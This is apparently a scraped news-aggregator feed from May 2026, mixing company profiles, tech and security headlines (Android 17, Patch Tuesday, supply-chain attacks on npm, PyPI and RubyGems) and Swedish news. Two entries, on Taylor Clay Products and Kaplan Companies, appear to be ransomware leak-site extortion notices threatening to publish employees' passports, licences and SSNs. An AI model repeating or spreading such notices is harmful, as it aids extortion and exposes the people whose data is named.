setcar.com.tn zoominfo.com/c/setcar/507355731 SETCAR is Tunisia's pioneering private manufacturer of buses, coaches, and minibuses, with over 50 years of excellence since 1976. Partnering with global leaders like Volvo and Iveco, they produce up to 500 vehicles annually, serving public transport, tourism, and institutional clients across Africa and the Middle East. With a 300-strong expert team, advanced production facilities, and dedicated after-sales support, SETCAR delivers innovative, eco-friendly mobility solutions built for reliability and performance
valueexch.com Value Exchange International Inc. is a trailblazing retail technology leader with over 30 years of expertise, delivering comprehensive digital solutions across Asia, the UK, Australia, and New Zealand. Their 300+ professionals provide 24/7 Managed Operations, Systems Integration, and innovative retail hardware — from Electronic Shelf Labels to AI-powered inspection robots — powering 20,000+ daily POS transactions and HK$400+ billion in annual retail sales. With a customer-centric approach and cutting-edge technology, VEII empowers retailers to thrive through seamless digital transformation and operational excellence
dodsonandhorrell.com zoominfo.com/c/dodson--horrell-ltd/21104188 Dodson Horrell is a world-leading, family-run feed manufacturer established in 1939, specializing in premium nutrition for horses, poultry, and zoo animals. With over 80 years of expertise, their science-backed formulations and dedicated Nutritional Helpline empower owners to care for every animal as an individual. As exclusive feed partners to the British Equestrian Teams and a trusted name across global equestrian communities, they combine heritage, innovation, and unwavering quality
amstelsecurities.com zoominfo.com/c/amstel-securities-llp/353641962 Amstel Securities is a premier independent brokerage firm founded in 1989, connecting Asian and global markets with 35+ years of expertise in fixed income, equities, and derivatives. As a trusted agency and matched-principal broker, they specialize in Southeast Asian domestic currency bonds, high-yield credit, and G7 markets, serving institutional clients with unbiased execution and deep liquidity. Backed by strategic partnerships with BNY Mellon's Pershing for clearing and custody, they deliver secure, efficient solutions for wealth managers, family offices, and accredited investors worldwide
getece.com zoominfo.com/c/getece-co-ltd/353619915 GeTeCe is Thailand's trusted ingredients partner since 1978, specializing in premium chemicals, fragrances, flavours, and food ingredients for diverse manufacturing industries. With four decades of expertise, a state-of-the-art blending facility, and strategic global partnerships, they deliver tailored solutions backed by deep market insights and regulatory compliance. Their dedicated technical team and reliable supply chain empower clients to innovate confidently and stay ahead in competitive markets across Southeast Asia
Denton Calvary Academy is a K-12 University-Model school that focuses on fostering a love of learnin...
US President Donald Trump has presented the next step after the military operation in Venezuela. "I will get all political prisoners out of Venezuela," he says, according to Reuters.
Google today previewed Android 17, the next version of Android that it is bringing to smartphones and other devices. Android 17 includes multiple new AI features, and it comes about a month ahead of when Apple plans to unveil iOS 27 with new AI capabilities. Google is now calling the AI features on Android "Gemini Intelligence," branding similar to Apple Intelligence. Google said it is transitioning Android from an operating system to an intelligence system, with proactive, on-device agentic AI. Expanded Gemini integration - Gemini will be able to do more tasks autonomously, from booking classes to making purchases. Visual context - Gemini will be able to draw context from what's on the screen, which is something that Apple is also bringing to iPhones soon. Google says Android users will be able to do things like bring up a long shopping list in the notes app, long press on the power button over the list, and have Gemini build a shopping cart with all of the items for delivery. Smarter web browsing - Gemini in Chrome will let users research, summarize, and compare content on the web. Chrome auto browse will also be able to do more tasks like reserving a parking spot or booking an appointment. Autofill - Android can fill more text fields in apps with Gemini's Personal Intelligence that draws information from apps like Gmail and Google Photos. Rambler - Rambler is an AI voice dictation feature that cuts out filler words like um, ah, and like. Rambler will take the important parts from voice dictation, and create a concise message. It works with multiple languages at once. Create My Widget - Create My Widget lets Android users build custom widgets by describing what they want in natural language. Widgets can do things like provide the weather, offer recipes, count down to events, provide the time, display stock info, and more. There are other changes coming to Android 17 too. 3D Emoji - Google is adopting Noto 3D, a new 3D emoji collection.
Android Auto - Android Auto is getting expanded Gemini integration and a refreshed look with support for the Material 3 Expressive design. Google is adding customizable widgets, edge-to-edge Google Maps, and Immersive Navigation, which includes 3D views highlighting important navigation details. When parked, cars will support YouTube playback. Gemini Intelligence is coming to Android Auto cars, and it will be able to do things like respond to texts automatically or order food for pickup. Google built-in - Cars with Google built-in are getting the same features, plus access to meeting apps like Zoom. Gemini is also rolling out to cars with Google built-in, and it can answer questions specific to each vehicle that it's installed in. Screen Reactions - Screen Reactions lets users film with the front and back cameras at the same time for social media reaction videos. Instagram integration - Google worked with Meta to improve the video and photo quality of content captured with Android devices and uploaded to Instagram. Google is also adding new tools to the Edits app, and improving Instagram on Android tablets. Pause Point - Users can set an app as distracting, and Pause Point will give a 10-second breather before an app opens. Users can do a short breathing exercise or set a timer to limit time in the app. There are also options for looking at favorite photos, or moving to an alternative app like an audiobook app. Pause Point requires users to restart a phone to turn it off, which makes it more difficult to ignore. Google says Gemini Intelligence features will roll out in waves beginning with the latest Samsung Galaxy and Google Pixel phones this summer, and expanding to Android watch, car, glasses, and laptops later in the year.
Gemini in Chrome features will be available in late June, with other Android 17 features expected to get to a stable release stage in June. This article, "Google Previews Android 17 With 'Gemini Intelligence' a Month Before Apple's iOS 27 Reveal" first appeared on MacRumors.com
A case study in why credentials are revoked before firings.
Teen trusted ChatGPT to help him “safely” experiment with drugs, logs show.
Microsoft and G42's planned $1 billion AI data center in Kenya has stalled amid disagreements over power commitments, with President William Ruto saying the country would need to "switch off half the country" to support the project at full scale. Tom's Hardware reports: The project, announced in May 2024 during Ruto's visit to Washington, was supposed to bring a geothermal-powered data center to the Olkaria region in Kenya's Rift Valley. G42 was to lead construction, with the facility running Microsoft Azure in a new East Africa cloud region. The first phase targeted 100 megawatts of capacity and was expected to be operational by this year, with a long-term goal of scaling to 1 gigawatt. President Ruto isn't exaggerating about shutting off half the country's power. Kenya's total installed electricity capacity sits between 3,000 and 3,200 megawatts, and peak demand reached a record 2,444 megawatts in January, according to data from KenGen, the country's government-owned electricity producer. The full 1 gigawatt build would therefore have consumed roughly a third of the country's total capacity, and even the first 100 megawatts would have required a significant share of the Olkaria geothermal complex's output, which currently generates around 950MW across all its plants. John Tanui, principal secretary at Kenya's Ministry of Information, told Bloomberg that the project hasn't been withdrawn and that talks are continuing, adding that the "scale of the data center they [Microsoft] wanted to do still requires some structuring." A separate 60-megawatt project with local developer EcoCloud is also still under discussion. [...] Microsoft is spending $190 billion on capex in 2026, and the company adds approximately 1 gigawatt of data center capacity every three months globally. But power constraints are proving to be a universal bottleneck: nearly half of planned U.S.
data center builds this year have been delayed or canceled due to shortages of electrical infrastructure.
Microsoft has released the Windows 10 KB5087544 extended security update to fix the May 2026 Patch Tuesday vulnerabilities and resolve an issue with the new Remote Desktop warnings. [...]
China aimed to cooperate with Washington in the spirit of “equality, respect and mutual benefit”, Beijing said on Wednesday ahead of US President Donald Trump’s state visit and a pivotal summit with Chinese President Xi Jinping. Chinese foreign ministry spokesman Guo Jiakun said the two leaders would hold “in-depth exchanges of views on major issues concerning China-US relations as well as world peace and development”. “China stands ready to work with the United States in the spirit of equality,...
Starmer vows to fight on despite another day of pressure from his party to quit.
The firm takes a generalist approach, backing companies across categories such as AI applications, fintech, healthcare, and security. The average check size for this fund will be between $3 million and $5 million, with the aim to back at least 30 startups.
Marco Rubio will become the first sitting US Secretary of State under Chinese sanctions to visit Beijing. Images of Rubio leaving for China on Air Force One with Donald Trump appear to have answered previous questions about whether he would skip such a globally important event. Rubio is also serving as the US National Security Adviser and would normally have been expected to visit China to lay the groundwork for such a high-stakes summit. Instead he has met his Chinese counterpart Wang Yi twice...
Today's Microsoft patch Tuesday fixes 137 different vulnerabilities. In addition, the update addresses 137 Chromium-related issues affecting Microsoft Edge.
Fortinet has released security patches for two critical vulnerabilities in FortiSandbox and FortiAuthenticator that could enable attackers to run commands or arbitrary code. [...]
Trafikverket warns of moose on the road on Route 190. Alingsås Tidning
Article URL: https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2026q2/018471.html Comments URL: https://news.ycombinator.com/item?id=48112042 Points: 358 # Comments: 199
Microsoft has released Windows 11 KB5089549 and KB5087420 cumulative updates for versions 25H2/24H2 and 23H2 to fix security vulnerabilities, bugs, and add new features. [...]
Today is Microsoft's May 2026 Patch Tuesday, with security updates for 120 flaws and no zero-days disclosed this month. [...]
Hey HN, Henry here from Cactus. We open-sourced Needle, a 26M parameter function-calling (tool use) model. It runs at 6000 tok/s prefill and 1200 tok/s decode on consumer devices. We were always frustrated by the little effort made towards building agentic models that run on budget phones, so we conducted investigations that led to an observation: agentic experiences are built upon tool calling, and massive models are overkill for it. Tool calling is fundamentally retrieval-and-assembly (match query to tool name, extract argument values, emit JSON), not reasoning. Cross-attention is the right primitive for this, and FFN parameters are wasted at this scale. Simple Attention Networks: the entire model is just attention and gating, no MLPs anywhere. Needle is an experimental run for single-shot function calling for consumer devices (phones, watches, glasses...). Training: - Pretrained on 200B tokens across 16 TPU v6e (27 hours) - Post-trained on 2B tokens of synthesized function-calling data (45 minutes) - Dataset synthesized via Gemini with 15 tool categories (timers, messaging, navigation, smart home, etc.) You can test it right now and finetune on your Mac/PC: https://github.com/cactus-compute/needle The full writeup on the architecture is here: https://github.com/cactus-compute/needle/blob/main/docs/simp... We found that the "no FFN" finding generalizes beyond function calling to any task where the model has access to external structured knowledge (RAG, tool use, retrieval-augmented generation). The model doesn't need to memorize facts in FFN weights if the facts are provided in the input. Experimental results to be published. While it beats FunctionGemma-270M, Qwen-0.6B, Granite-350M, LFM2.5-350M on single-shot function calling, those models have more scope/capacity and excel in conversational settings. We encourage you to test on your own tools via the playground and finetune accordingly. This is part of our broader work on Cactus (https://github.com/cactus-compute/cactus), an inference engine built from scratch for mobile, wearables and custom hardware. We wrote about Cactus here previously: https://news.ycombinator.com/item?id=44524544 Everything is MIT licensed. Weights: https://huggingface.co/Cactus-Compute/needle GitHub: https://github.com/cactus-compute/needle Comments URL: https://news.ycombinator.com/item?id=48111896 Points: 590 # Comments: 172
Cannabis cultivation uncovered by chance; couple sentenced to prison. Alingsås Tidning
The EU plans to target "addictive design" features on TikTok, Instagram, and other platforms, including endless scrolling, autoplay, push notifications, and recommendation loops that can steer children toward harmful content. European Commission President Ursula von der Leyen said new regulation could arrive later this year, alongside an EU age-verification app meant to make child-safety rules easier to enforce. CNBC reports: "We are taking action against TikTok and its addictive design -- endless scrolling, autoplay, and push notifications. The same applies to Meta, because we believe Instagram and Facebook are failing to enforce their own minimum age of 13," Von der Leyen said. "We are investigating platforms that allow children to go down 'rabbit holes' of harmful content -- such as videos that promote eating disorders or self-harm," she added. The EU's executive arm has also developed its own age verification app, which has the "highest privacy standards in the world," according to Von der Leyen. Member states will soon be able to integrate it into their digital wallets, and it can easily be enforced by online platforms. "No more excuses -- the technology for age-verification is available," the EU chief said. The EU Commission could have a legal proposal prepared as soon as the summer, as it awaits the advice and findings of its 'Special Panel of experts on Child Safety Online.' Read more of this story at Slashdot.
The situation could still change and there might be more confirmed cases, warns the head of the World Health Organization.
Article URL: https://duckdb.org/2026/05/12/quack-remote-protocol Comments URL: https://news.ycombinator.com/item?id=48111765 Points: 357 # Comments: 75
Apple today said Hearing Aid features are now available for the AirPods Pro 2 and AirPods Pro 3 in Italy, Romania, and Czechia, while Hypertension alerts have expanded to Israel. The Hearing Aid option allows the AirPods Pro to be used as an over-the-counter alternative to a traditional set of hearing aids. The AirPods Pro can improve sound to mitigate mild to moderate hearing loss, adjusting voices and sounds around the user to improve hearing. It can also set music, videos, and phone calls to optimal sound levels using a personalized hearing profile created after taking a Hearing Test. Loud Sound Reduction also prevents hearing damage from loud ambient noise by cutting down on high-decibel sound when using Transparency and Adaptive modes. Hearing Aid capabilities are available with the AirPods Pro 2 and AirPods Pro 3 when paired with a device running iOS 26/iPadOS 26 or later. In Israel, users will be able to get an alert if the Apple Watch detects signs of chronic high blood pressure. Alerts use data collected from the heart rate sensor over a 30-day period. Hypertension alerts are available on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later. This article, "Apple Watch Hypertension Alerts and AirPods Hearing Aid Feature Expand to More Countries" first appeared on MacRumors.com.
Today's Patch Tuesday is a busier one than normal for the quarter. Both AMD and Intel have rolled out new updates for Linux customers among other security disclosures today. Thankfully though the vulnerabilities don't appear to be too widespread or impactful...
"All modern operating systems do this, including macOS and Linux."
How much anxiety does she have after the interview on Fördomsshowen, and is Mohamsson a sore loser? The Liberal Party leader answers the audience's questions directly from her private office; no question is off limits!
https://www.reddit.com/r/Android/comments/1tb8xls/introducin... Comments URL: https://news.ycombinator.com/item?id=48111545 Points: 890 # Comments: 1477
Article URL: https://www.eff.org/deeplinks/2026/05/canadas-bill-c-22-repackaged-version-last-years-surveillance-nightmare Comments URL: https://news.ycombinator.com/item?id=48111531 Points: 360 # Comments: 116
Rapport had technical problems during its 19:30 broadcast. "We are waiting for Rapport due to technical problems," the broadcast read.
eBay board doubts GameStop's ability to buy and operate the much larger firm.
US President Donald Trump departed for a three-day state visit to China on Tuesday without first lady Melania Trump, travelling instead with Cabinet officials and business executives in a delegation that contrasts sharply with the pageantry of his 2017 visit. Hours before his departure, the office of the first lady confirmed Melania’s no-show in an email response to the South China Morning Post. “First lady Melania Trump is not travelling this time,” a spokesperson said. The confirmation comes a...
Apple's newest M5 Pro and M5 Max MacBook Pro models have been hitting new low prices on Amazon recently, and now the M5 model from 2025 has a new record low price. You can get the 32GB/1TB 14-inch M5 MacBook Pro for $1,799.00, down from $2,099.00. Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running. At $300 off, this is now the lowest price we've ever tracked on this model, and it's only available in Silver. This is the model that launched in the fall of 2025 as part of a refresh of the MacBook Pro lineup, featuring a 14.2-inch Liquid Retina XDR display and 10-core CPU and 10-core GPU. Amazon provides an estimated delivery date of May 13-14 for free delivery options, depending on your location. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week. This article, "M5 MacBook Pro Hits Record Low Price With Major $300 Discount at Amazon" first appeared on MacRumors.com.
DXVK-NVAPI 0.9.2 is now available for this implementation of NVIDIA's NVAPI/NVOFAPI interfaces atop DXVK and VKD3D-Proton that is used in turn by Valve's Steam Play (Proton) for enhanced NVIDIA Linux gaming support...
Powders, gels, and fermented nutrients could someday join the battlefield menu
Google has revealed its vision for the AI laptop of tomorrow.
Google has big plans for Android in 2026, and most of it is AI.
We wanted to let the Exchange Server community know that there are no security releases for any version of Exchange Server in May 2026, for customers with Exchange SE, or Exchange 2016 or 2019 ESU. Please keep upgrading your organizations to Exchange SE. The Exchange Team
Cooperative symbolism behind tea with the Trumps in the Forbidden City. This article was first published on November 10, 2017 by Laura Zhou. Beijing’s Forbidden City was more than just an opulent backdrop for US President Donald Trump’s first day in China. One of the main halls used to stage a set piece on Trump’s tour of the former imperial palace was weighted with meaning and chosen to underscore cooperation between the two countries. As part of their higher-than-usual welcome to the capital,...
An anonymous reader quotes a report from Reuters: EBay on Tuesday rejected a $56 billion takeover bid from the much smaller GameStop over financing doubts, calling the proposal "neither credible nor attractive." EBay, which has roughly four times GameStop's market value, also underscored that its turnaround efforts under CEO Jamie Iannone have boosted growth, with its stock returning 201% since Iannone took the position six years ago. "We have concluded that your proposal is neither credible nor attractive," eBay Chairman Paul Pressler said in a statement. "eBay's Board is confident the company, under its current management team, is well-positioned to continue to drive sustainable growth." He also pointed to concerns with GameStop's bid, including its financing, its impact on eBay's long-term growth and the leadership structure of a potentially combined company. Last week, GameStop's CEO Ryan Cohen delivered one of the most memorable CNBC interviews in recent memory... initially disinterested, then increasingly hostile, with little eye contact, few real answers to basic questions, and repeated robotic deflections to "check the website." It's worth a watch if you have a few extra minutes. Read more of this story at Slashdot.
An IBM engineer posted the first set of patches enabling the Rust programming language support for the Linux kernel to be built on the s390 architecture...
Quietly extends waivers to 2029 after realizing it was about to leave millions of devices unpatched
Yesterday SVT revealed that Foxtrot's "second-in-command" Mohamed "Moewgli" Mohdhi has been arrested by police in Tunisia. Now Justice Minister Gunnar Strömmer and the police are commenting on the reports. "Our police know who they are after," says the justice minister.
Exim has released security updates to address a severe security issue affecting certain configurations that could enable memory corruption and potential code execution. Exim is an open-source Mail Transfer Agent (MTA) designed for Unix-like systems to receive, route, and deliver email. The vulnerability, tracked as CVE-2026-45185, aka Dead.Letter, has been described as a use-after-free
Tonight it is time for the Eurovision semi-final. Besides Sweden, Israel will also compete tonight. And several countries, such as Spain, Ireland and the Netherlands, have boycotted this year's edition because of Israel's participation.
Adult wild boars have long been rooting up and destroying parts of Kviberg cemetery in Gothenburg. But now, as spring arrives, a new gang has been spotted: a whole litter of piglets. "Since they don't have a mother, we've noticed that they come very close," says Julia Tomasson, who lives nearby.
Alingsås: 9 degrees and overcast during the evening. Alingsås Tidning
Andriy Yermak was named by Ukraine's two anti-corruption agencies as a suspect in a money-laundering scheme.
Instructure CEO Steve Daly's got some explaining to do
Long story short - Small business of submitted by
Apple today announced that characters from the hit animated kids show Bluey are coming to five Apple Arcade games starting Thursday, May 21, as part of a limited-time crossover event. The games that will be receiving Bluey updates include Crossy Road Castle, stitch., puffies., Suika Game+, and Disney Coloring World+. Apple Arcade will also be adding another four games on Thursday, June 4: Mini Football Legends, My Talking Tom 2+, Coffee Inc 2+, and FreeCell Solitaire: Card Game+. More details about each game are outlined in Apple's announcement. Apple Arcade is a subscription service that provides access to hundreds of games across the iPhone, iPad, Mac, Apple TV, and Apple Vision Pro. All of the games are free of ads and in-app purchases. In the U.S., Apple Arcade costs $6.99 per month, and it is also bundled with other Apple services in all Apple One plans. Apple Arcade can be accessed through the App Store and the Apple Games app. This article, "Bluey is Taking Over Apple Arcade Next Week" first appeared on MacRumors.com.
The FCC has softened its ban on foreign-made consumer routers, allowing vendors to keep issuing broader software and firmware updates for devices already in use in the U.S. through at least January 2029. Dark Reading reports: Under the original FCC ruling, foreign manufacturers were permitted to provide only limited maintenance and security patches to US customers through March 2027. In a public note (PDF) on May 8, the FCC extended that deadline to at least January 2029 and also expanded the scope of permissible updates. The FCC will now allow foreign manufacturers to provide not just minor security fixes and changes, but also more major software and firmware updates that could affect router functionality, which previously required additional FCC review. The agency described the revisions as intended to ensure the continued safety of already deployed foreign-made consumer routers in the US. "The FCC likely issued this revision in response to the operational realities of network security and the slow pace of equipment replacement," says Jason Soroko, senior fellow at Sectigo. "Replacing millions of embedded devices across national infrastructure requires immense time and capital, and abandoning existing systems to a completely unpatched state would create an immediate vulnerability." "This waiver significantly alleviates the most pressing fears tied to the initial ban by preventing a sudden and dangerous security vacuum," added Soroko. Read more of this story at Slashdot.
Article URL: https://obsidian.md/blog/future-of-plugins/ Comments URL: https://news.ycombinator.com/item?id=48109970 Points: 438 # Comments: 159
After guilty pleas, prison terms, and seizures, the DOJ has opened the compensation process
Article URL: https://www.epicfurious.com/ Comments URL: https://news.ycombinator.com/item?id=48109519 Points: 371 # Comments: 124
Article URL: https://www.nair.sh/guides-and-opinions/communicating-your-expertise/why-senior-developers-fail-to-communicate-their-expertise Comments URL: https://news.ycombinator.com/item?id=48109460 Points: 746 # Comments: 315
A senior Chinese diplomat has accused Europe of taking an outdated, inward-looking approach to China, while signalling that Beijing is open to addressing Brussels’ concerns. Li Jian, director general of the Chinese foreign ministry’s Department of European Affairs, delivered his strongly worded speech at a high-level forum on Tuesday. At the conference hosted by the European Union delegation to China in Beijing, officials and experts from both sides shared concerns about economic dependencies,...
If your Mac's storage has been mysteriously shrinking recently and you use Google Chrome, you may have already identified the culprit. The browser has been downloading a 4GB AI model file onto computers without explicit user consent. Here's how to reclaim the space. The file in question is called "weights.bin," which powers Google's on-device Gemini Nano AI model – the engine behind Chrome features like scam detection, autofill suggestions, and the "Help Me Write" tool. Local models tend to be pretty big storage-wise, and this one is no different. The problem is that Google hasn't clearly signposted the fact that it's eating 4GB of your drive with training data. The issue only recently came to light thanks to security researcher Alexander Hanff, who noticed that Chrome installs the model on any device meeting the minimum hardware requirements, only without prompting you whether you'd like it there in the first place. How to Check if the File Is on Your Mac: The first thing to do is confirm that the model is actually taking up space on your machine. While there's no clear answer in Google's release notes, recent reports suggest that the file started appearing after updating to Chrome version 148.0.7778.97. Here's how you can find out if your computer was affected: Open Finder, then click Go in the menu bar. Hold the Option key and click Library in the dropdown menu. Open Application Support ➝ Google ➝ Chrome ➝ Default. Look for a folder named "OptGuideOnDeviceModel." If the folder exists and contains a file called weights.bin, the model is installed. You can right-click the file and choose Get Info to confirm its size. If the folder isn't there, you can relax – Chrome hasn't downloaded the model to your Mac. How to Remove the 4GB File for Good: Simply deleting weights.bin from Chrome's library folder isn't a long-term solution because Chrome will likely quietly re-download it the next time you launch the browser. To make the removal permanent, you need to disable Chrome's on-device AI features. Open Chrome. Click the three-dot menu in the top-right corner, then choose Settings. In the left sidebar, click System. Toggle off On-device AI. Once this setting is switched off, Chrome will remove the model and should stop downloading it in future updates. Remember that deleting the model will also disable any Chrome features that rely on it. If you don't see the toggle in Chrome's Settings, it likely hasn't propagated to your computer yet. In that case, type chrome://flags into Chrome's address bar and disable any AI-related flags you see, then delete the weights.bin file manually in Finder. If after that you're still concerned about the lack of consent, it might be worth switching to a different browser. This article, "Stop Chrome Browser From Downloading a Hidden 4GB AI File" first appeared on MacRumors.com.
In a deal worth 845 million kronor, Botrygg in Linköping is selling a number of properties in the city to the company Episurf. Among other things, the football facility Linköping Arena is included in the purchase.
In parallel with the trial in the major procuring case in Ångermanland, even more suspected sex buyers in the tangle are being investigated. The statute of limitations for purchasing a sexual service or act is two years, and the police are now working feverishly with extra resources so that as many sex buyers as possible can be brought to trial. Even so, roughly half of those exposed may go free.
At 15, Fredric Gülich Brendling was caught with hashish; a few years later the police classified him as part of a criminal group. Now the 21-year-old has been sentenced to life in prison for murdering three people in a hair salon in Uppsala.
Article URL: https://www.jeffgeerling.com/blog/2026/bambu-lab-abusing-open-source-social-contract/ Comments URL: https://news.ycombinator.com/item?id=48109224 Points: 1345 # Comments: 416
While the ongoing RAM chip shortage is leading some Android smartphone makers to increase prices, one analyst believes that Apple will take advantage of the situation with the upcoming iPhone 18 Pro and iPhone 18 Pro Max. In a research note with GF Securities today, analyst Jeff Pu said he expects Apple to outperform in the smartphone market by having an "aggressive pricing strategy" for the iPhone 18 Pro models. He previously predicted that the starting prices of the iPhone 18 Pro models will be unchanged or only slightly higher compared to the iPhone 17 Pro models. In the U.S., the iPhone 17 Pro starts at $1,099 and the iPhone 17 Pro Max starts at $1,199, with 256GB of storage. Both devices are equipped with 12GB of RAM, and the iPhone 18 Pro models are expected to have an equal amount of RAM. Apple said that it expects "significantly higher memory costs" in the current March-June quarter, so it is not entirely immune to the problem. However, Apple's scale likely gives it more leverage over RAM suppliers compared to most if not all Android smartphone makers. In addition, Pu previously said that he expected Apple to find ways to lower the costs of some other iPhone components, including the display and cameras. iPhone 18 Pro models are rumored to feature a smaller Dynamic Island, a faster A20 Pro chip, variable aperture for at least one rear camera, a simplified Camera Control button, 5G via satellite, a special "Dark Cherry" color, and more. Apple is expected to unveil the iPhone 18 Pro models in September, while the iPhone 18 and iPhone 18e are expected to debut around March 2027. This article, "iPhone 18 Pro May Have 'Aggressive' Starting Price Despite RAM Crisis" first appeared on MacRumors.com.
Volume and sensitivity of the data cited as chief concerns
A fire broke out at a waste facility in Sunderbyn outside Luleå on Tuesday afternoon. The rescue service was on site with several units and expected a lengthy operation. "Our focus is not on putting out the fire; we need to put resources into preventing it from spreading to adjacent piles," said incident commander Adam Dahlberg.
RubyGems, the standard package manager for the Ruby programming language, has temporarily paused account sign ups following what has been described as a "major malicious attack." "We're dealing with a major malicious attack on RubyGems right now," Maciej Mensfeld, senior product manager for software supply chain security at Mend.io, said in a post on X. "Signups are paused for the time being.
Skistar's late decision not to offer summer activities in Vemdalen this year has sparked strong reactions in the area. On Monday, the company's CEO Stefan Sjöstrand was on site to, among other things, meet staff. "It is never positive when you have to make decisions like this," he says, while stressing that it is a pause and not a permanent shutdown.
Destination Vemdalen received no advance warning before Skistar announced that it is closing its climbing park and lift-served cycling this summer. "I was both surprised and a little shocked. They came very late, and we have been working on the basis that Skistar would be open this summer," says Anna Hansson, CEO of Vemdalen's destination company.
The Apple Sales Coach app will begin using AI-generated video presenters to deliver personalized training content to retail salespeople around the world. In a new video message, an Apple trainer said that the update addresses a limitation of traditional training programs: the impossibility of creating truly individualized content for hundreds of thousands of salespeople across different markets, languages, and product focuses. Apple said it will now use AI to generate short, focused videos tailored to the products a seller works with, the skills they are developing, and the language they speak. Apple to Use AI-Generated Presenters for Sales Training Videos pic.twitter.com/6DRkLAvyfm— Aaron (@aaronp613) May 12, 2026 AI-generated presenters will be identifiable by an on-screen icon, and Apple emphasized that the underlying content remains entirely human-driven. The company's training team apparently writes every script and verifies every detail, with AI serving as the delivery mechanism rather than the author. Apple said the shift will allow it to produce more videos on more topics, faster, and update them more frequently than was previously possible. The company described the move as "just the beginning," noting that Apple Sales Coach improves the more it is used. This article, "Apple Sales Coach Will Use AI-Generated Video Presenters" first appeared on MacRumors.com.
The police have become aware of several possible recruitment attempts in Umeå recently. The police are now deploying more resources at sports facilities. "We are taking it extremely seriously," says Maria Forsberg, group leader for the local police in Umeå.
Taiwan is watching the coming summit between US President Donald Trump and Chinese leader Xi Jinping with unease, concerned that any discussions over arms sales could see the island used as leverage in a broader Sino-American deal. Trump arrives in Beijing on Wednesday for a three-day state visit. According to the White House, the engagements will include a bilateral meeting with Xi and a state banquet on Thursday, as well as a working lunch before Trump departs on Friday. Speaking at the White...
Launch of Musk's monster rocket could be in May
Taylor Clay Products specializes in premium architectural brick, thin brick, and custom masonry solutions, catering to architects and builders for over 75 years. The company offers a wide selection of colors, textures, and finishes, including custom blends tailored to specific projects. We will upload 72gb of corporate data soon. Employee personal information (DL and other personal docs), contracts, client information, drawings and specifications.
Kaplan Companies specializes in providing rental and commercial properties, focusing on new homes and maintenance services for current residents. The company aims to cater to individuals and families seeking quality housing solutions. We will upload 45gb of corporate data soon. Employee and owners personal information (passports, DLs, SSNs, and other personal docs), contracts and agreements, client information, financials, payment details, projects files, drawings and specifications and so on.
A Swedish traveller on a flight from Johannesburg has been exposed to a person infected with hantavirus. The Swede is now being isolated. "One passenger was close enough to be flagged in contact tracing," says acting state epidemiologist Erik Sturegård on Morgonstudion.
Hello r/sysadmin, I'm u/AutoModerator, and welcome to this month's Patch Megathread! This is the (mostly) safe location to talk about the latest patches, updates, and releases. We put this thread into place to help gather all the information about this month's updates: What is fixed, what broke, what got released and should have been caught in QA, etc. We do this both to keep clutter out of the subreddit, and provide you, the dear reader, a singular resource to read. For those of you who wish to review prior Megathreads, you can do so here. While this thread is timed to coincide with Microsoft's Patch Tuesday, feel free to discuss any patches, updates, and releases, regardless of the company or product. NOTE: This thread is usually posted before the release of Microsoft's updates, which are scheduled to come out at 5:00PM UTC. Remember the rules of safe patching: Deploy to a test/dev environment before prod. Deploy to a pilot/test group before the whole org. Have a plan to roll back if something doesn't work. Test, test, and test! submitted by /u/AutoModerator
A tokenizer library file present in Hugging Face AI models can be manipulated to hijack the model's outputs and exfiltrate data.
It's been nearly one year to the week since Intel introduced Project Battlematrix as their initiative for improving their Linux driver support for the Arc Pro B-Series with enhancements such as bettering the multi-GPU support in allowing up to eight Arc Pro GPUs per system as well as other open-source driver optimizations in the era of AI. Recently with the Arc Pro B70 in having four review samples for testing I was finally able to try out the multi-GPU state of the Arc (Pro) graphics cards on Linux with their open-source driver code.
Former Liberal minister Paulina Brandberg does not rule out returning to the Riksdag, for the summer. "I have not decided what I will do," she says.
The creator of the popular open source tool Curl, Sweden's Daniel Stenberg, is skeptical of the hype around Anthropic's new AI model Mythos. Anthropic itself describes Mythos as an advanced AI for finding security flaws in code. According to Stenberg, the model analyzed a recent version of Curl's Git repository and reported only five alleged security problems. After the Curl team reviewed them, only one ordinary bug and one actual vulnerability remained, The Register reports. The single confirmed vulnerability will, according to Stenberg, receive a low-severity CVE classification and is expected to be fixed in the next Curl release, 8.21.0, later in June. At the same time, Stenberg says Mythos did manage to find several other bugs and that the reports were well written and clear. He argues, however, that today's AI-based code analysis tools are already good at this kind of work, and he is therefore not especially impressed by Mythos. "An incredibly successful marketing stunt," Daniel Stenberg writes on his blog.
More than 170 packages in both the NPM and PyPI ecosystems have been compromised in a new, wide-ranging supply chain attack dubbed "Mini Shai-Hulud", Security Week reports. The attack has hit, among others, popular projects from Tanstack, Mistral AI, Opensearch and Ui Path. The infected packages contained malicious code that tries to steal developer credentials, API keys, cloud secrets, crypto wallets and credentials for AI tools and messaging services. In the attack on Tanstack, the attackers exploited several flaws in the project's Github Actions workflows to publish 84 malicious package versions through the legitimate release pipeline. The packages' malware, router_init.js, was used to steal sensitive information and attempted to spread further. Python packages from Mistral AI and Guardrails AI were also infected, with separate Linux-based malicious code that, among other things, targeted password managers such as 1Password and Bitwarden. The hacker group TeamPCP is singled out as being behind the attack. The group has previously been linked to several supply chain attacks against open source ecosystems.
Former franchise operators claim telco unfairly cut commission and other payments
According to information given to the Financial Times, Amazon employees have begun using the company's AI tool Meshclaw to automate large numbers of unimportant tasks, primarily to improve their AI usage statistics. Amazon has set a target that more than 80 percent of the company's developers should use AI every week. The company has also started measuring and displaying statistics on AI usage and token consumption internally. Meshclaw can create AI agents that can, for example, handle email, interact with Slack and carry out simpler work tasks automatically. According to employees, this has created a culture in which some try to maximize their usage rather than use the tools effectively. At the same time, some are worried about using the AI tool because it can create security risks and lead to tasks being carried out incorrectly.
Workers are using an internal AI tool to automate non-essential tasks.
The Uppdrag granskning documentary series "Jakten" has been nominated for the Golden Nymph Awards at the international television festival in Monte-Carlo. In the documentary, reporter Diamant Salihu follows the police's fight against pedophiles. "It feels incredibly important to highlight this subject and make the documentary available to an international audience," says Diamant Salihu.
Article URL: https://blog.maximeheckel.com/posts/on-rendering-the-sky-sunsets-and-planets/ Comments URL: https://news.ycombinator.com/item?id=48107997 Points: 516 # Comments: 40
Tech firm's employees can get an 'admin' role letting them into the National Data Integration Tenant... and its identifiable information
